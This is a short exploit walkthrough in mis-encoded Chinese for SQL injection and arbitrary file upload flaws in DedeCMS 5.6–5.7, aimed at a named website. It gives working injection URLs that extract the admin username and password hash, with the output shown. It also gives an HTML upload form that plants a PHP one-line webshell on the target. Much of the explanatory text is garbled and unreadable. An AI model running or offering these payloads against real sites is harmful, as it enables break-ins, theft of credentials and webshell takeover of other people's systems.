dedecms5.6-5.7עϴ©
ע©վ http://www.political-security.com/
ȷʡ/data/admin/ver.txtҳȡϵͳʱ䣬
www.political-security.com/data/mysql_error_trace.inc ̨
Ȼʡ/member/ajax_membergroup.php?action=post&membergroup=1ҳ棬ͼ˵ڸ©
Ȼд
鿴Աʺ
http://www.political-security.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin
鿴Ա
http://www.political-security.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
鿴Ա
õ19λģȥǰλһλõԱ16λMD5
8d2
9b1ef9f8c5a5af42
9
cmd5û ֻòԵڶ
ϴ©
ֻҪ½ԱģȻҳ
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post
ͼ˵ͨ/plus/carbuyaction.phpѾɹϴҳ桰/dialog/select_soft_post
ǽPhpһ仰ľչΪrarȣύҳupload1.htm
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">ύ</button><br><br>
ϴɹ
ҳ:
[1]